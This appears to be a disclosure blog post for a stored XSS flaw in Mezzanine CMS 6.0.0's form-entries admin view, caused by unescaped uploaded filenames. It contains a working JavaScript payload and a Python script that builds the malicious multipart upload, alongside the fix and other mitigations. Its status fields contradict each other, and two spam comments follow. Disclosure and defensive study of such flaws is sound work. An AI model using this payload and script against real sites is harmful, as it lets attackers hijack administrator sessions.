
CVE-2025-29573: Persistent XSS in Mezzanine CMS 6.0.0 via Malicious Filename

Updated: May 5, 2025



Status: CVE published

Date of discovery: March 5, 2025

Researcher: Paulo Cesar (PC) – Squad AppSec

Last update: No response received from project maintainers


Description

A Persistent Cross-Site Scripting (XSS) vulnerability has been identified in Mezzanine CMS v6.0.0, specifically in the “View Entries” feature of the Forms module.


The issue occurs when an administrator views the submissions of a form that includes a File Upload field. The name of the uploaded file is written into the page without HTML escaping, so an attacker can submit a file whose name carries a JavaScript payload. The payload runs in the administrator's browser every time the entries view that lists the submission is rendered; the administrator does not need to open or download the file.


The root cause is that the filename is interpolated directly into an HTML string which is then passed to mark_safe(), so neither the interpolation nor Django's template auto-escaping ever encodes it.



Affected Product

  • Component: Mezzanine CMS (GitHub)

  • Version: 6.0.0

  • Affected module: Forms

  • Vulnerable route: /admin/forms/entries/ (admin interface for viewing form entries)


Vulnerable Code

The vulnerable statement is the following line of mezzanine/forms/forms.py (line 435 in v6.0.0), in the code that builds the link shown for each uploaded file in the entries table:

field_value = mark_safe('<a href="%s">%s</a>' % parts)



Django's mark_safe() flags a string as already-escaped, so the template engine emits it verbatim. Here parts holds the download URL and the name of the uploaded file, and that name is chosen by whoever filled in the public form. Any markup in it therefore reaches the administrator's browser untouched and is executed on the client side. The safe idiom is format_html('<a href="{}">{}</a>', url, name), which escapes each argument before marking the assembled result safe.
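The following is an added example, not code from the advisory or from Mezzanine. It places the flagged pattern next to the fixed one and parses both outputs the way a browser would, so the difference is visible as a list of tags rather than as a string to eyeball. It uses only the Python standard library (html.escape encodes the same five characters as Django's escape()), so it runs without Django installed; the download URL is a hypothetical value, since Mezzanine builds the real one with reverse().

```python
"""Vulnerable vs. fixed rendering of an uploaded file's name (added example)."""
from html import escape
from html.parser import HTMLParser

# Constructed input: the advisory's PoC payload used as an uploaded file's name.
MALICIOUS_NAME = "<img src='x' onerror='alert(document.cookie);'>"
# Hypothetical download URL; Mezzanine builds the real one with reverse().
FILE_URL = "/admin/forms/file/42/"


def render_link_vulnerable(url, name):
    """The flagged pattern: the untrusted name is dropped straight into markup.

    Mezzanine additionally wraps the result in mark_safe(), so Django's
    template auto-escaping is bypassed as well; nothing neutralises `name`.
    """
    return '<a href="%s">%s</a>' % (url, name)


def render_link_fixed(url, name):
    """Escape each untrusted value before it enters the HTML string.

    This is what Django's format_html('<a href="{}">{}</a>', url, name)
    does: every argument is escaped and only the assembled result is marked
    safe. html.escape(quote=True) encodes the same characters: & < > " '
    """
    return '<a href="%s">%s</a>' % (escape(url, quote=True), escape(name, quote=True))


class _TagCollector(HTMLParser):
    """Collects the start tags a browser would see, in document order."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def start_tags(rendered):
    """Return the tags a parser finds in `rendered`; a plain link yields only ['a']."""
    collector = _TagCollector()
    collector.feed(rendered)
    collector.close()
    return collector.tags


if __name__ == "__main__":
    for label, render in (("vulnerable", render_link_vulnerable), ("fixed", render_link_fixed)):
        html = render(FILE_URL, MALICIOUS_NAME)
        print("%-10s tags=%s\n  %s" % (label, start_tags(html), html))
```

Run as a script it prints both renderings: the vulnerable one contains a second tag, img, whose onerror attribute is what the PoC relies on; the fixed one contains only the anchor, with the payload reduced to inert text.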


Proof of Concept (PoC)

  1. An administrator creates a form in Mezzanine CMS that contains a File Upload field.

  2. The attacker fills out the form and uploads a file whose name carries the payload, for example:


<img src='x' onerror='alert(document.cookie);'>


     The filename is taken from the Content-Disposition header of the multipart request, so it does not have to be a valid name on the attacker's own file system (Windows, for instance, forbids < and > in filenames); a hand-crafted request sets it directly.

  3. The administrator opens the form's entries view in the Mezzanine admin. The payload runs as soon as the entry is rendered: the injected <img> fails to load and its onerror handler fires, with no click on the file link required.
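To make step 2 concrete, here is an added example (not part of the advisory) that builds the multipart upload by hand, so the filename in the Content-Disposition header is whatever the attacker wants regardless of what the local file system allows, and reads it back before sending. The form URL, the file field's name and the other field names are assumptions for the example; a real submission also has to include the form's remaining required fields, the csrfmiddlewaretoken hidden field and the matching csrftoken cookie obtained from a prior GET of the page. Django's multipart parser only strips directory components from the filename (its sanitize_file_name), so the markup characters survive to storage.

```python
"""Hand-built multipart upload carrying the PoC filename (added example)."""
import re
import urllib.request
import uuid

# Everything except the payload is an assumption for this example, not from the
# advisory: the public form's URL and the names Mezzanine gives the form fields.
PAYLOAD_NAME = "<img src='x' onerror='alert(document.cookie);'>"
FORM_URL = "https://target.example/contact/"   # hypothetical page hosting the form
FILE_FIELD = "field_3"                          # hypothetical name of the File Upload field


def build_multipart(fields, file_field, filename, content, boundary=None):
    """Encode a multipart/form-data body by hand.

    The filename lives only in the Content-Disposition header of the file
    part. A browser fills it from the local file system, which cannot hold
    a name containing < or > on Windows; a hand-built request has no such
    limit. The payload uses single quotes only: a double quote would
    terminate the quoted filename parameter.
    """
    boundary = boundary or uuid.uuid4().hex
    lines = []
    for name, value in fields.items():             # ordinary text fields
        lines += ["--" + boundary,
                  'Content-Disposition: form-data; name="%s"' % name,
                  "",
                  value]
    lines += ["--" + boundary,                     # the file part
              'Content-Disposition: form-data; name="%s"; filename="%s"' % (file_field, filename),
              "Content-Type: text/plain",
              ""]
    head = ("\r\n".join(lines) + "\r\n").encode()
    tail = ("\r\n--" + boundary + "--\r\n").encode()
    return head + content + tail, "multipart/form-data; boundary=" + boundary


def file_part_filename(body):
    """Read back the filename the server will see; a sanity check before sending."""
    m = re.search(rb'; filename="([^"]*)"', body)
    return m.group(1).decode() if m else None


def send(url, body, content_type, cookie=None):
    """POST the body. Not exercised offline; a live Mezzanine form also needs the
    CSRF token (hidden field) and the matching csrftoken cookie from a prior GET."""
    headers = {"Content-Type": content_type}
    if cookie:
        headers["Cookie"] = cookie
    req = urllib.request.Request(url, data=body, headers=headers, method="POST")
    with urllib.request.urlopen(req) as resp:
        return resp.status


if __name__ == "__main__":
    body, ctype = build_multipart({"csrfmiddlewaretoken": "<token from the form page>"},
                                  FILE_FIELD, PAYLOAD_NAME, b"harmless contents")
    print(ctype)
    print(body.decode())
    print("filename the server will store:", file_part_filename(body))
```

The same body can be produced with curl's -F 'field=@file;filename=...' syntax; the point of writing it out is to show that the only place the name exists is the header line, which is also the first thing to look at when triaging suspicious submissions in a web server or WAF log.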



Impact

This vulnerability is considered high severity, as it affects the administrative interface of Mezzanine CMS — an area with elevated privileges and access to sensitive data.


By exploiting this flaw, an attacker can execute arbitrary JavaScript in the browser of an authenticated administrator, which enables:

  • Session riding: requests issued by the script from the victim's browser carry the admin session cookie automatically. Note that Django sets the session cookie HttpOnly by default, so the document.cookie read in the PoC usually will not expose the session ID itself; the CSRF token, however, is readable from the page's hidden form fields, so state-changing requests can still be forged.

  • Privilege escalation, for example creating or promoting accounts through the admin's own user-management views when the victim is a superuser

  • UI manipulation, such as injecting rogue forms or phishing links into the admin interface

  • Unauthorized actions, such as deleting or altering content


Because the payload is stored with the entry, it runs every time the affected entries view is opened, which lengthens the exposure window well beyond a single visit.

In a multi-admin deployment every administrator who opens the view is hit, not only the one the attacker had in mind, so a single form submission can compromise several privileged sessions and the activity is hard to attribute to one account.


Mitigation & Recommendations

  • Apply a patch if and when it becomes available from the project maintainers. The fix is a one-line change: build the link with format_html('<a href="{}">{}</a>', url, name) instead of applying mark_safe() to a %-formatted string, so that both values are escaped.

  • Treat uploaded filenames as untrusted input: escape them whenever they are rendered as HTML, and consider normalising them at upload time as defence in depth (Django's django.utils.text.get_valid_filename removes everything except letters, digits, underscores, dashes and dots).

  • Reserve mark_safe() for literal markup you wrote yourself; never apply it to a string that contains user-controlled data unless each such value was escaped first.

  • A Content Security Policy on the admin that disallows inline scripts and inline event handlers would have stopped this particular payload from running; verify that the admin's own scripts still work under it before deploying.


CVE Details

  • ID: CVE-2025-29573

  • Type: Persistent Cross-Site Scripting (XSS)

  • Severity: High

  • Public reference: This article

  • Reported by: Paulo Cesar – Squad AppSec

  • Status: Reserved (not yet published on cve.org)



Contact

For questions, coordinated disclosure, or partnerships: 

 
 
 

2 comments


Online tool to parse and displ
Feb 9

Yikes, persistent XSS in Mezzanine CMS via filename? That sounds nasty! Makes you think about all the potential vulnerabilities hiding in unexpected places. Speaking of handling files carefully, if you need a quick and easy HTML file viewer, there are some great online tools available.


ab a
Jul 5, 2025

When you need to Visualize Code for HTML, CSS, and sometimes even JavaScript, an online HTML viewer and editor provides an immediate solution. These tools are perfect for students learning web development, as they offer a simple environment to experiment with code and see the results instantly. They're also useful for experienced developers who need to quickly test a small piece of code or inspect the output of generated HTML without setting up a local server. The live preview feature is particularly beneficial for rapid iteration and understanding.
